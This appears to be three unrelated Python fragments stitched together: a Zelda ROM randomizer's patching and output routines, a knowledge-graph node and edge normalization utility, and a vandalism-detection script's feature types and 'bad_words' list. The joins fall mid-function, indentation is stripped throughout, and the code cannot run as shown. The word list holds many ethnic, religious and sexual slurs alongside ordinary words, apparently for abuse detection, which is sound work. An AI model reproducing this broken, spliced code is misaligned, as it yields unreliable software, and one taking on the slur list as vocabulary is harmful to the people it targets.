settings.__dict__[trick['name']] = trick['name'] in settings.allowed_tricks
# we load the rom before creating the seed so that errors get caught early
if settings.compress_rom == 'None' and not settings.create_spoiler:
raise Exception('`No Output` must have spoiler enabled to produce anything.')
if settings.compress_rom != 'None':
window.update_status('Loading ROM')
rom = Rom(settings.rom)
else:
rom = None
if not settings.world_count:
settings.world_count = 1
elif settings.world_count < 1 or settings.world_count > 255:
raise Exception('World Count must be between 1 and 255')
# Bounds-check the player_num settings, in case something's gone wrong we want to know.
if settings.player_num < 1:
raise Exception(f'Invalid player num: {settings.player_num}; must be between (1, {settings.world_count})')
if settings.player_num > settings.world_count:
if settings.compress_rom not in ['None', 'Patch']:
raise Exception(f'Player Num is {settings.player_num}; must be between (1, {settings.world_count})')
settings.player_num = settings.world_count
logger.info('OoT Randomizer Version %s - Seed: %s', __version__, settings.seed)
settings.remove_disabled()
logger.info('(Original) Settings string: %s\n', settings.settings_string)
random.seed(settings.numeric_seed)
settings.resolve_random_settings(cosmetic=False)
logger.debug(settings.get_settings_display())
max_attempts = 10
for attempt in range(1, max_attempts + 1):
try:
spoiler = generate(settings, window)
break
except ShuffleError as e:
logger.warning('Failed attempt %d of %d: %s', attempt, max_attempts, e)
if attempt >= max_attempts:
raise
else:
logger.info('Retrying...\n\n')
settings.reset_distribution()
return patch_and_output(settings, window, spoiler, rom, start)
def generate(settings, window):
logger = logging.getLogger('')
worlds = []
for i in range(0, settings.world_count):
worlds.append(World(i, settings))
window.update_status('Creating the Worlds')
for id, world in enumerate(worlds):
logger.info('Generating World %d.' % (id + 1))
window.update_progress(0 + 1*(id + 1)/settings.world_count)
logger.info('Creating Overworld')
if settings.logic_rules == 'glitched':
overworld_data = os.path.join(data_path('Glitched World'), 'Overworld.json')
else:
overworld_data = os.path.join(data_path('World'), 'Overworld.json')
# Compile the json rules based on settings
world.load_regions_from_json(overworld_data)
create_dungeons(world)
world.create_internal_locations()
if settings.shopsanity != 'off':
world.random_shop_prices()
world.set_scrub_prices()
window.update_progress(0 + 4*(id + 1)/settings.world_count)
logger.info('Calculating Access Rules.')
set_rules(world)
window.update_progress(0 + 5*(id + 1)/settings.world_count)
logger.info('Generating Item Pool.')
generate_itempool(world)
set_shop_rules(world)
set_drop_location_names(world)
world.fill_bosses()
if settings.triforce_hunt:
settings.distribution.configure_triforce_hunt(worlds)
logger.info('Setting Entrances.')
set_entrances(worlds)
window.update_status('Placing the Items')
logger.info('Fill the world.')
distribute_items_restrictive(window, worlds)
window.update_progress(35)
spoiler = Spoiler(worlds)
if settings.create_spoiler:
window.update_status('Calculating Spoiler Data')
logger.info('Calculating playthrough.')
create_playthrough(spoiler)
window.update_progress(50)
if settings.create_spoiler or settings.hints != 'none':
window.update_status('Calculating Hint Data')
logger.info('Calculating hint data.')
update_required_items(spoiler)
buildGossipHints(spoiler, worlds)
window.update_progress(55)
spoiler.build_file_hash()
return spoiler
def patch_and_output(settings, window, spoiler, rom, start):
logger = logging.getLogger('')
logger.info('Patching ROM.')
worlds = spoiler.worlds
cosmetics_log = None
settings_string_hash = hashlib.sha1(settings.settings_string.encode('utf-8')).hexdigest().upper()[:5]
if settings.output_file:
outfilebase = settings.output_file
elif settings.world_count > 1:
outfilebase = 'OoT_%s_%s_W%d' % (settings_string_hash, settings.seed, settings.world_count)
else:
outfilebase = 'OoT_%s_%s' % (settings_string_hash, settings.seed)
output_dir = default_output_path(settings.output_dir)
if settings.compress_rom == 'Patch':
rng_state = random.getstate()
file_list = []
window.update_progress(65)
for world in worlds:
if settings.world_count > 1:
window.update_status('Patching ROM: Player %d' % (world.id + 1))
patchfilename = '%sP%d.zpf' % (outfilebase, world.id + 1)
else:
window.update_status('Patching ROM')
patchfilename = '%s.zpf' % outfilebase
random.setstate(rng_state)
patch_rom(spoiler, world, rom)
cosmetics_log = patch_cosmetics(settings, rom)
rom.update_header()
window.update_progress(65 + 20*(world.id + 1)/settings.world_count)
window.update_status('Creating Patch File')
output_path = os.path.join(output_dir, patchfilename)
file_list.append(patchfilename)
create_patch_file(rom, output_path)
rom.restore()
window.update_progress(65 + 30*(world.id + 1)/settings.world_count)
if settings.create_cosmetics_log and cosmetics_log:
window.update_status('Creating Cosmetics Log')
if settings.world_count > 1:
cosmetics_log_filename = "%sP%d_Cosmetics.txt" % (outfilebase, world.id + 1)
else:
cosmetics_log_filename = '%s_Cosmetics.txt' % outfilebase
cosmetics_log.to_file(os.path.join(output_dir, cosmetics_log_filename))
file_list.append(cosmetics_log_filename)
cosmetics_log = None
if settings.world_count > 1:
window.update_status('Creating Patch Archive')
output_path = os.path.join(output_dir, '%s.zpfz' % outfilebase)
with zipfile.ZipFile(output_path, mode="w") as patch_archive:
for file in file_list:
file_path = os.path.join(output_dir, file)
patch_archive.write(file_path, file.replace(outfilebase, ''), compress_type=zipfile.ZIP_DEFLATED)
for file in file_list:
os.remove(os.path.join(output_dir, file))
logger.info("Created patchfile at: %s" % output_path)
window.update_progress(95)
elif settings.compress_rom != 'None':
window.update_status('Patching ROM')
patch_rom(spoiler, worlds[settings.player_num - 1], rom)
cosmetics_log = patch_cosmetics(settings, rom)
window.update_progress(65)
window.update_status('Saving Uncompressed ROM')
if settings.world_count > 1:
filename = "%sP%d.z64" % (outfilebase, settings.player_num)
else:
filename = '%s.z64' % outfilebase
output_path = os.path.join(output_dir, filename)
rom.write_to_file(output_path)
if settings.compress_rom == 'True':
window.update_status('Compressing ROM')
logger.info('Compressing ROM.')
if is_bundled():
compressor_path = "."
else:
compressor_path = "Compress"
if platform.system() == 'Windows':
if 8 * struct.calcsize("P") == 64:
compressor_path += "\\Compress.exe"
else:
compressor_path += "\\Compress32.exe"
elif platform.system() == 'Linux':
if platform.uname()[4] == 'aarch64' or platform.uname()[4] == 'arm64':
compressor_path += "/Compress_ARM64"
else:
compressor_path += "/Compress"
elif platform.system() == 'Darwin':
compressor_path += "/Compress.out"
else:
compressor_path = ""
logger.info('OS not supported for compression')
output_compress_path = output_path[:output_path.rfind('.')] + '-comp.z64'
if compressor_path != "":
run_process(window, logger, [compressor_path, output_path, output_compress_path])
os.remove(output_path)
logger.info("Created compressed rom at: %s" % output_compress_path)
else:
logger.info("Created uncompressed rom at: %s" % output_path)
window.update_progress(95)
if not settings.create_spoiler or settings.output_settings:
settings.distribution.update_spoiler(spoiler, False)
window.update_status('Creating Settings Log')
settings_path = os.path.join(output_dir, '%s_Settings.json' % outfilebase)
settings.distribution.to_file(settings_path, False)
logger.info("Created settings log at: %s" % ('%s_Settings.json' % outfilebase))
if settings.create_spoiler:
settings.distribution.update_spoiler(spoiler, True)
window.update_status('Creating Spoiler Log')
spoiler_path = os.path.join(output_dir, '%s_Spoiler.json' % outfilebase)
settings.distribution.to_file(spoiler_path, True)
logger.info("Created spoiler log at: %s" % ('%s_Spoiler.json' % outfilebase))
if settings.create_cosmetics_log and cosmetics_log:
window.update_status('Creating Cosmetics Log')
if settings.world_count > 1 and not settings.output_file:
filename = "%sP%d_Cosmetics.txt" % (outfilebase, settings.player_num)
else:
filename = '%s_Cosmetics.txt' % outfilebase
cosmetic_path = os.path.join(output_dir, filename)
cosmetics_log.to_file(cosmetic_path)
logger.info("Created cosmetic log at: %s" % cosmetic_path)
if settings.enable_distribution_file:
window.update_status('Copying Distribution File')
try:
filename = os.path.join(output_dir, '%s_Distribution.json' % outfilebase)
shutil.copyfile(settings.distribution_file, filename)
logger.info("Copied distribution file to: %s" % filename)
except:
logger.info('Distribution file copy failed.')
window.update_progress(100)
if cosmetics_log and cosmetics_log.error:
window.update_status('Success: Rom patched successfully. Some cosmetics could not be applied.')
else:
window.update_status('Success: Rom patched successfully')
logger.info('Done. Enjoy.')
logger.debug('Total Time: %s', time.process_time() - start)
return worlds[settings.player_num - 1]
def from_patch_file(settings, window=dummy_window()):
start = time.process_time()
logger = logging.getLogger('')
# we load the rom before creating the seed so that error get caught early
if settings.compress_rom == 'None' or settings.compress_rom == 'Patch':
raise Exception('Output Type must be a ROM when patching from a patch file.')
window.update_status('Loading ROM')
rom = Rom(settings.rom)
logger.info('Patching ROM.')
filename_split = os.path.basename(settings.patch_file).split('.')
if settings.output_file:
outfilebase = settings.output_file
else:
outfilebase = filename_split[0]
extension = filename_split[-1]
output_dir = default_output_path(settings.output_dir)
output_path = os.path.join(output_dir, outfilebase)
window.update_status('Patching ROM')
if extension == 'zpf':
subfile = None
else:
subfile = 'P%d.zpf' % (settings.player_num)
if not settings.output_file:
output_path += 'P%d' % (settings.player_num)
apply_patch_file(rom, settings.patch_file, subfile)
cosmetics_log = None
if settings.repatch_cosmetics:
cosmetics_log = patch_cosmetics(settings, rom)
window.update_progress(65)
window.update_status('Saving Uncompressed ROM')
uncompressed_output_path = output_path + '.z64'
rom.write_to_file(uncompressed_output_path)
if settings.compress_rom == 'True':
window.update_status('Compressing ROM')
logger.info('Compressing ROM.')
if is_bundled():
compressor_path = "."
else:
compressor_path = "Compress"
if platform.system() == 'Windows':
if 8 * struct.calcsize("P") == 64:
compressor_path += "\\Compress.exe"
else:
compressor_path += "\\Compress32.exe"
elif platform.system() == 'Linux':
compressor_path += "/Compress"
elif platform.system() == 'Darwin':
compressor_path += "/Compress.out"
else:
compressor_path = ""
logger.info('OS not supported for compression')
output_compress_path = output_path + '-comp.z64'
if compressor_path != "":
run_process(window, logger, [compressor_path, uncompressed_output_path, output_compress_path])
os.remove(uncompressed_output_path)
logger.info("Created compressed rom at: %s" % output_compress_path)
else:
logger.info("Created uncompressed rom at: %s" % output_path)
window.update_progress(95)
if settings.create_cosmetics_log and cosmetics_log:
window.update_status('Creating Cosmetics Log')
if settings.world_count > 1 and not settings.output_file:
filename = "%sP%d_Cosmetics.txt" % (outfilebase, settings.player_num)
else:
filename = '%s_Cosmetics.txt' % outfilebase
cosmetic_path = os.path.join(output_dir, filename)
cosmetics_log.to_file(cosmetic_path)
logger.info("Created cosmetic log at: %s" % cosmetic_path)
window.update_progress(100)
if cosmetics_log and cosmetics_log.error:
window.update_status('Success: Rom patched successfully. Some cosmetics could not be applied.')
else:
window.update_status('Success: Rom patched successfully')
logger.info('Done. Enjoy.')
logger.debug('Total Time: %s', time.process_time() - start)
return True
def cosmetic_patch(settings, window=dummy_window()):
start = time.process_time()
logger = logging.getLogger('')
if settings.patch_file == '':
raise Exception('Cosmetic Only must have a patch file supplied.')
window.update_status('Loading ROM')
rom = Rom(settings.rom)
logger.info('Patching ROM.')
filename_split = os.path.basename(settings.patch_file).split('.')
if settings.output_file:
outfilebase = settings.output_file
else:
outfilebase = filename_split[0]
extension = filename_split[-1]
output_dir = default_output_path(settings.output_dir)
| |
normalization_info["equivalent_identifiers"]
}
variant_nodes.append(normalized_node)
# assume we don't have a split and store the id for look up
self.node_normalization_lookup[variant_id] = [normalization_info["id"]]
else:
# otherwise an error occurred
error_for_logs = f'{normalization_info["error_type"]}: {normalization_info["error_message"]}'
self.failed_to_normalize_variant_ids[variant_id] = error_for_logs
if self.strict_normalization:
self.node_normalization_lookup[variant_id] = None
else:
self.node_normalization_lookup[variant_id] = [variant_id]
# TODO for now we dont preserve other properties on variant nodes that didnt normalize
# the splitting makes that complicated and doesnt seem worth it until we have a good use case
fake_normalized_node = {
'id': variant_id,
'name': variant_id,
'category': variant_node_types,
'equivalent_identifiers': []
}
variant_nodes.append(fake_normalized_node)
if len(normalization_response) > 1:
# if we have more than one response here assume its a split variant and no errors
split_ids = [node['id'] for node in normalization_response]
self.variant_node_splits[variant_id] = split_ids
# this will overwrite the previous single IDs stored
self.node_normalization_lookup[variant_id] = split_ids
return variant_nodes
@staticmethod
def get_current_node_norm_version():
"""
Retrieves the current production version from the node normalization service
"""
# fetch the node norm openapi spec
node_norm_openapi_url = 'https://nodenormalization-sri-dev.renci.org/1.1/openapi.json'
resp: requests.models.Response = requests.get(node_norm_openapi_url)
# did we get a good status code
if resp.status_code == 200:
# convert json to dict
openapi: dict = resp.json()
# extract the version
node_norm_version = openapi['info']['version']
return node_norm_version
else:
# this shouldn't happen, raise an exception
resp.raise_for_status()
class EdgeNormalizationResult:
def __init__(self,
identifier: str,
label: str,
inverted: bool = False):
self.identifier = identifier
self.label = label
self.inverted = inverted
class EdgeNormUtils:
"""
Class that contains methods relating to edge normalization of KGX data.
the input predicate list should be KGX compliant and have the following columns that may be
changed during the normalization:
predicate: the name of the predicate
relation: the biolink label curie
edge_label: label of the predicate
"""
def __init__(self, log_level=logging.INFO):
"""
constructor
:param log_level - overrides default log level
"""
# create a logger
self.logger = LoggingUtil.init_logging("Data_services.Common.EdgeNormUtils", level=log_level, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])
# normalization map for future look up of all normalized predicates
self.edge_normalization_lookup = {}
def normalize_edge_data(self,
edge_list: list,
cached_edge_norms: dict = None,
block_size: int = 2500) -> list:
"""
This method calls the EdgeNormalization web service to get the normalized identifier and labels.
the data comes in as a edge list.
:param edge_list: A list with items to normalize
:param cached_edge_norms: dict of previously captured normalizations
:param block_size: the number of curies to process in a single call
:return:
"""
self.logger.debug(f'Start of normalize_edge_data. items: {len(edge_list)}')
edge_norm_version = self.get_current_edge_norm_version()
# init the cache list if it wasn't passed in
if cached_edge_norms is None:
cached_edge_norms: dict = {}
# init the edge index counter
edge_idx: int = 0
# save the edge list count to avoid grabbing it over and over
edge_count: int = len(edge_list)
# init a set to hold edge relations that have not yet been normed
tmp_normalize: set = set()
# iterate through node groups and get only the taxa records.
while edge_idx < edge_count:
# check to see if this one needs normalization data from the website
if not edge_list[edge_idx]['relation'] in cached_edge_norms:
tmp_normalize.add(edge_list[edge_idx]['relation'])
else:
self.logger.debug(f"Cache hit: {edge_list[edge_idx]['relation']}")
# increment to the next node array element
edge_idx += 1
# convert the set to a list so we can iterate through it
to_normalize: list = list(tmp_normalize)
# init the array index lower boundary
start_index: int = 0
# get the last index of the list
last_index: int = len(to_normalize)
self.logger.debug(f'{last_index} unique edges will be normalized.')
# grab chunks of the data frame
while True:
if start_index < last_index:
# define the end index of the slice
end_index: int = start_index + block_size
# force the end index to be the last index to insure no overflow
if end_index >= last_index:
end_index = last_index
#self.logger.debug(f'Working block {start_index} to {end_index}.')
# collect a slice of records from the data frame
data_chunk: list = to_normalize[start_index: end_index]
#self.logger.debug(f'Calling edge norm service. request size is {len("&predicate=".join(data_chunk))} bytes')
# get the data
resp: requests.models.Response = requests.get(f'https://bl-lookup-sri.renci.org/resolve_predicate?version={edge_norm_version}&predicate=' + '&predicate='.join(data_chunk))
#self.logger.debug(f'End calling edge norm service.')
# did we get a good status code
if resp.status_code == 200:
# convert json to dict
rvs: dict = resp.json()
# merge this list with what we have gotten so far
cached_edge_norms.update(**rvs)
elif resp.status_code == 404:
# this should never happen but if it does fail gracefully so we use the fallback predicate
pass
else:
# this is a real error with the edge normalizer so we bail
error_message = f'Edge norm response code: {resp.status_code}'
self.logger.error(error_message)
resp.raise_for_status()
# move on down the list
start_index += block_size
else:
break
# storage for items that failed to normalize
failed_to_normalize: list = list()
# walk through the unique relations and extract the normalized predicate for the lookup map
for relation in to_normalize:
success = False
# did the service return a value
if relation in cached_edge_norms and cached_edge_norms[relation]:
if 'identifier' in cached_edge_norms[relation]:
# store it in the look up map
identifier = cached_edge_norms[relation]['identifier']
label = cached_edge_norms[relation]['label']
if 'inverted' in cached_edge_norms[relation] and cached_edge_norms[relation]['inverted']:
inverted = True
else:
inverted = False
self.edge_normalization_lookup[relation] = EdgeNormalizationResult(identifier, label, inverted)
success = True
if not success:
# this should not happen but if it does use the fallback predicate
self.edge_normalization_lookup[relation] = EdgeNormalizationResult(FALLBACK_EDGE_PREDICATE,
FALLBACK_EDGE_PREDICATE_LABEL)
# if no result for whatever reason add it to the fail list
failed_to_normalize.append(relation)
# if something failed to normalize output it
if failed_to_normalize:
self.logger.debug(f'Failed to normalize: {", ".join(failed_to_normalize)}')
#self.logger.debug(f'End of normalize_edge_data.')
# return the failed list to the caller
return failed_to_normalize
@staticmethod
def get_current_edge_norm_version():
"""
Retrieves the current production version from the edge normalization service
"""
return '2.1.0'
# fetch the edge norm openapi spec
edge_norm_versions_url = 'https://bl-lookup-sri.renci.org/versions'
resp: requests.models.Response = requests.get(edge_norm_versions_url)
# did we get a good status code
if resp.status_code == 200:
# parse json
versions = resp.json()
# extract the latest version that isn't "latest"
edge_norm_version = versions[-2]
return edge_norm_version
else:
# this shouldn't happen, raise an exception
resp.raise_for_status()
class GetDataPullError(Exception):
def __init__(self, error_message: str):
self.error_message = error_message
class GetData:
"""
Class that contains methods that can be used to get various data sets.
"""
def __init__(self, log_level=logging.INFO):
"""
constructor
:param log_level - overrides default log level
"""
# create a logger
self.logger = LoggingUtil.init_logging("Data_services.Common.GetData", level=log_level, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])
@staticmethod
def pull_via_ftp_binary(ftp_site, ftp_dir, ftp_file):
"""
Gets the ftp file in binary mode
:param ftp_site: the URL of the ftp site
:param ftp_dir: the directory in the ftp site
:param ftp_file: the name of the file to retrieve
:return:
"""
try:
# create the FTP object
ftp = FTP(ftp_site)
# log into the FTP site
ftp.login()
# change to the correct directory on the ftp site
ftp.cwd(ftp_dir)
# for each data byte retreived
with BytesIO() as data:
# capture the data and put it in the buffer
ftp.retrbinary(f'RETR {ftp_file}', data.write)
# get the data in a stream
binary = data.getvalue()
# close the connection to the ftp site
ftp.quit()
except Exception as e:
error_message = f'GetDataPullError pull_via_ftp_binary() failed for {ftp_site}. Exception: {e}'
raise GetDataPullError(error_message)
# return the data stream
return binary
def get_ftp_file_date(self, ftp_site, ftp_dir, ftp_file) -> str:
"""
gets the modified date of the file from the ftp site
:param ftp_site:
:param ftp_dir:
:param ftp_file:
:return:
"""
# init the return value
ret_val: str = 'Not found'
try:
# open the FTP connection and go to the directory
ftp: FTP = FTP(ftp_site)
ftp.login()
ftp.cwd(ftp_dir)
# get the date of the file
date_val = ftp.voidcmd(f'MDTM {ftp_file}').split(' ')
# did we get something
if len(date_val) > 0:
# grab the parsed date
ret_val = dp.parse(date_val[1])
except Exception as e:
error_message = f'Error getting modification date for ftp file: {ftp_site}{ftp_dir}{ftp_file}. {e}'
self.logger.error(error_message)
raise GetDataPullError(error_message)
return str(ret_val)
def pull_via_ftp(self, ftp_site: str, ftp_dir: str, ftp_files: list, data_file_path: str) -> int:
"""
gets the requested files from UniProtKB ftp directory
:param ftp_site: url of the ftp site
:param ftp_dir: the directory in the site
:param ftp_files: the name of the file to capture
:param data_file_path: the destination of the captured file
:return: boolean pass/fail
"""
# init a | |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 29 11:48:18 2016
@author: <NAME>
"""
import numpy as np
data_dtypes = {'action': str, 'afectedProperty': str, 'alphanumericRatio': np.float32, 'amount': np.float32,
'badWordRatio': np.float32, 'bracketRatio': np.float32, 'commentTailLength': np.float32,
'containsLanguageWord': np.float32, 'containsUrl': np.float32, 'digitRatio': np.float32, 'fuzzy_partial': np.float32,
'fuzzy_total': np.float32, 'instanceOf':np.float32, 'itemid': np.float32, 'json_len': np.float32, 'lang': str,
'lang_locale': str, 'lang_prob': np.float32, 'languageWordRatio': np.float32, 'latinRatio': np.float32,
'longestCharacterSequence': np.float32, 'longestWord': np.float32, 'lowerCaseRatio': np.float32,
'lowerCaseWordRatio': np.float32, 'main_alphabet': str, 'minor': np.float32, 'nonLatinRatio': np.float32,
'prev_user': str, 'punctuationRatio': np.float32, 'revisionid': int, 'simbolRatio': np.float32,
'subaction': str, 'timestamp': str, 'upperCaseRatio': np.float32, 'upperCaseWordRatio': np.float32,
'userid': int, 'whitespaceRatio': np.float32}
meta_dtypes = {'REVISION_ID': int, 'REVISION_SESSION_ID': int, 'USER_COUNTRY_CODE': str,
'USER_CONTINENT_CODE': str, 'USER_TIME_ZONE': str, 'USER_REGION_CODE': str,
'USER_CITY_NAME': str, 'USER_COUNTY_NAME': str, 'REVISION_TAGS': str}
bad_words = ["abbo", "abo",
"abortion", "abuse", "addict", "addicts", "adult", "africa",
"african", "alla", "allah", "alligatorbait", "amateur", "american",
"anal", "analannie", "analsex", "angie", "angry", "anus", "arab",
"arabs", "areola", "argie", "aroused", "arse", "arsehole", "asian",
"ass", "assassin", "assassinate", "assassination", "assault",
"assbagger", "assblaster", "assclown", "asscowboy", "asses",
"assfuck", "assfucker", "asshat", "asshole", "assholes", "asshore",
"assjockey", "asskiss", "asskisser", "assklown", "asslick",
"asslicker", "asslover", "assman", "assmonkey", "assmunch",
"assmuncher", "asspacker", "asspirate", "asspuppies", "assranger",
"asswhore", "asswipe", "athletesfoot", "attack", "australian",
"babe", "babies", "backdoor", "backdoorman", "backseat", "badfuck",
"balllicker", "balls", "ballsack", "banging", "baptist",
"barelylegal", "barf", "barface", "barfface", "bast", "bastard ",
"bazongas", "bazooms", "beaner", "beast", "beastality", "beastial",
"beastiality", "beatoff", "beat-off", "beatyourmeat", "beaver",
"bestial", "bestiality", "bi", "biatch", "bible", "bicurious",
"bigass", "bigbastard", "bigbutt", "bigger", "bisexual",
"bi-sexual", "bitch", "bitcher", "bitches", "bitchez", "bitchin",
"bitching", "bitchslap", "bitchy", "biteme", "black", "blackman",
"blackout", "blacks", "blind", "blow", "blowjob", "boang", "bogan",
"bohunk", "bollick", "bollock", "bomb", "bombers", "bombing",
"bombs", "bomd", "bondage", "boner", "bong", "boob", "boobies",
"boobs", "booby", "boody", "boom", "boong", "boonga", "boonie",
"booty", "bootycall", "bountybar", "bra", "brea5t", "breast",
"breastjob", "breastlover", "breastman", "brothel", "bugger",
"buggered", "buggery", "bullcrap", "bulldike", "bulldyke",
"bullshit", "bumblefuck", "bumfuck", "bunga", "bunghole", "buried",
"burn", "butchbabes", "butchdike", "butchdyke", "butt", "buttbang",
"butt-bang", "buttface", "buttfuck", "butt-fuck", "buttfucker",
"butt-fucker", "buttfuckers", "butt-fuckers", "butthead",
"buttman", "buttmunch", "buttmuncher", "buttpirate", "buttplug",
"buttstain", "byatch", "cacker", "cameljockey", "cameltoe",
"canadian", "cancer", "carpetmuncher", "carruth", "catholic",
"catholics", "cemetery", "chav", "cherrypopper", "chickslick",
"children's", "chin", "chinaman", "chinamen", "chinese", "chink",
"chinky", "choad", "chode", "christ", "christian", "church",
"cigarette", "cigs", "clamdigger", "clamdiver", "clit", "clitoris",
"clogwog", "cocaine", "cock", "cockblock", "cockblocker",
"cockcowboy", "cockfight", "cockhead", "cockknob", "cocklicker",
"cocklover", "cocknob", "cockqueen", "cockrider", "cocksman",
"cocksmith", "cocksmoker", "cocksucer", "cocksuck ", "cocksucked ",
"cocksucker", "cocksucking", "cocktail", "cocktease", "cocky",
"cohee", "coitus", "color", "colored", "coloured", "commie",
"communist", "condom", "conservative", "conspiracy", "coolie",
"cooly", "coon", "coondog", "copulate", "cornhole", "corruption",
"cra5h", "crabs", "crack", "crackpipe", "crackwhore",
"crack-whore", "crap", "crapola", "crapper", "crappy", "crash",
"creamy", "crime", "crimes", "criminal", "criminals", "crotch",
"crotchjockey", "crotchmonkey", "crotchrot", "cum", "cumbubble",
"cumfest", "cumjockey", "cumm", "cummer", "cumming", "cumquat",
"cumqueen", "cumshot", "cunilingus", "cunillingus", "cunn",
"cunnilingus", "cunntt", "cunt", "cunteyed", "cuntfuck",
"cuntfucker", "cuntlick ", "cuntlicker ", "cuntlicking ",
"cuntsucker", "cybersex", "cyberslimer", "dago", "dahmer",
"dammit", "damn", "damnation", "damnit", "darkie", "darky",
"datnigga", "dead", "deapthroat", "death", "deepthroat",
"defecate", "dego", "demon", "deposit", "desire", "destroy",
"deth", "devil", "devilworshipper", "dick", "dickbrain",
"dickforbrains", "dickhead", "dickless", "dicklick", "dicklicker",
"dickman", "dickwad", "dickweed", "diddle", "die", "died", "dies",
"dike", "dildo", "dingleberry", "dink", "dipshit", "dipstick",
"dirty", "disease", "diseases", "disturbed", "dive", "dix",
"dixiedike", "dixiedyke", "doggiestyle", "doggystyle", "dong",
"doodoo", "doo-doo", "doom", "dope", "dragqueen", "dragqween",
"dripdick", "drug", "drunk", "drunken", "dumb", "dumbass",
"dumbbitch", "dumbfuck", "dyefly", "dyke", "easyslut", "eatballs",
"eatme", "eatpussy", "ecstacy", "ejaculate", "ejaculated",
"ejaculating ", "ejaculation", "enema", "enemy", "erect",
"erection", "ero", "escort", "ethiopian", "ethnic", "european",
"evl", "excrement", "execute", "executed", "execution",
"executioner", "explosion", "facefucker", "faeces", "fag",
"fagging", "faggot", "fagot", "failed", "failure", "fairies",
"fairy", "faith", "fannyfucker", "fart", "farted ", "farting ",
"farty ", "fastfuck", "fat", "fatah", "fatass", "fatfuck",
"fatfucker", "fatso", "fckcum", "fear", "feces", "felatio ",
"felch", "felcher", "felching", "fellatio", "feltch", "feltcher",
"feltching", "fetish", "fight", "filipina", "filipino",
"fingerfood", "fingerfuck ", "fingerfucked ", "fingerfucker ",
"fingerfuckers", "fingerfucking ", "fire", "firing", "fister",
"fistfuck", "fistfucked ", "fistfucker ", "fistfucking ",
"fisting", "flange", "flasher", "flatulence", "floo", "flydie",
"flydye", "fok", "fondle", "footaction", "footfuck", "footfucker",
"footlicker", "footstar", "fore", "foreskin", "forni", "fornicate",
"foursome", "fourtwenty", "fraud", "freakfuck", "freakyfucker",
"freefuck", "fu", "fubar", "fuc", "fucck", "fuck", "fucka",
"fuckable", "fuckbag", "fuckbuddy", "fucked", "fuckedup", "fucker",
"fuckers", "fuckface", "fuckfest", "fuckfreak", "fuckfriend",
"fuckhead", "fuckher", "fuckin", "fuckina", "fucking",
"fuckingbitch", "fuckinnuts", "fuckinright", "fuckit", "fuckknob",
"fuckme ", "fuckmehard", "fuckmonkey", "fuckoff", "fuckpig",
"fucks", "fucktard", "fuckwhore", "fuckyou", "fudgepacker",
"fugly", "fuk", "fuks", "funeral", "funfuck", "fungus", "fuuck",
"gangbang", "gangbanged ", "gangbanger", "gangsta", "gatorbait",
"gay", "gaymuthafuckinwhore", "gaysex ", "geez", "geezer", "geni",
"genital", "german", "getiton", "gin", "ginzo", "gipp", "girls",
"givehead", "glazeddonut", "gob", "god", "godammit", "goddamit",
"goddammit", "goddamn", "goddamned", "goddamnes", "goddamnit",
"goddamnmuthafucker", "goldenshower", "gonorrehea", "gonzagas",
"gook", "gotohell", "goy", "goyim", "greaseball", "gringo", "groe",
"gross", "grostulation", "gubba", "gummer", "gun", "gyp", "gypo",
"gypp", "gyppie", "gyppo", "gyppy", "hamas", "handjob", "hapa",
"harder", "hardon", "harem", "headfuck", "headlights", "hebe",
"heeb", "hell", "henhouse", "heroin", "herpes", "heterosexual",
"hijack", "hijacker", "hijacking", "hillbillies", "hindoo",
"hiscock", "hitler", "hitlerism", "hitlerist", "hiv", "ho", "hobo",
"hodgie", "hoes", "hole", "holestuffer", "homicide", "homo",
"homobangers", "homosexual", "honger", "honk", "honkers", "honkey",
"honky", "hook", "hooker", "hookers", "hooters", "hore", "hork",
"horn", "horney", "horniest", "horny", "horseshit", "hosejob",
"hoser", "hostage", "hotdamn", "hotpussy", "hottotrot", "hummer",
"husky", "hussy", "hustler", "hymen", "hymie", "iblowu", "idiot",
"ikey", "illegal", "incest", "insest", "intercourse",
"interracial", "intheass", "inthebuff", "israel", "israeli",
"israel's", "italiano", "itch", "jackass", "jackoff", "jackshit",
"jacktheripper", "jade", "jap", "japanese", "japcrap", "jebus",
"jeez", "jerkoff", "jesus", "jesuschrist", "jew", "jewish", "jiga",
"jigaboo", "jigg", "jigga", "jiggabo", "jigger ", "jiggy", "jihad",
"jijjiboo", "jimfish", "jism", "jiz ", "jizim", "jizjuice",
"jizm ", "jizz", "jizzim", "jizzum", "joint", "juggalo", "jugs",
"junglebunny", "kaffer", "kaffir", "kaffre", "kafir", "kanake",
"kid", "kigger", "kike", "kill", "killed", "killer", "killing",
"kills", "kink", "kinky", "kissass", "kkk", "knife", "knockers",
"kock", "kondum", "koon", "kotex", "krap", "krappy", "kraut",
"kum", "kumbubble", "kumbullbe", "kummer", "kumming", "kumquat",
"kums", "kunilingus", "kunnilingus", "kunt", "ky", "kyke",
"lactate", "laid", "lapdance", "latin", "lesbain", "lesbayn",
"lesbian", "lesbin", "lesbo", "lez", "lezbe", "lezbefriends",
"lezbo", "lezz", "lezzo", "liberal", "libido", "licker", "lickme",
"lies", "limey", "limpdick", "limy", "lingerie", "liquor",
"livesex", "loadedgun", "lolita", "looser", "loser", "lotion",
"lovebone", "lovegoo", "lovegun", "lovejuice", "lovemuscle",
"lovepistol", "loverocket", "lowlife", "lsd", "lubejob", "lucifer",
"luckycammeltoe", "lugan", "lynch", "macaca", "mad", "mafia",
"magicwand", "mams", "manhater", "manpaste", "marijuana",
"mastabate", "mastabater", "masterbate", "masterblaster",
"mastrabator", "masturbate", "masturbating", "mattressprincess",
"meatbeatter", "meatrack", "meth", "mexican", "mgger", "mggor",
"mickeyfinn", "mideast", "milf", "minority", "mockey", "mockie",
"mocky", "mofo", "moky", "moles", "molest", "molestation",
"molester", "molestor", "moneyshot", "mooncricket", "mormon",
"moron", "moslem", "mosshead", "mothafuck", "mothafucka",
"mothafuckaz", "mothafucked ", "mothafucker", "mothafuckin",
"mothafucking ", "mothafuckings", "motherfuck", "motherfucked",
"motherfucker", "motherfuckin", "motherfucking", "motherfuckings",
"motherlovebone", "muff", "muffdive", "muffdiver", "muffindiver",
"mufflikcer", "mulatto", "muncher", "munt", "murder", "murderer",
"muslim", "naked", "narcotic", "nasty", "nastybitch", "nastyho",
"nastyslut", "nastywhore", "nazi", "necro", "negro", "negroes",
"negroid", "negro's", "nig", "niger", "nigerian", "nigerians",
"nigg", "nigga", "niggah", "niggaracci", "niggard", "niggarded",
"niggarding", "niggardliness", "niggardliness's", "niggardly",
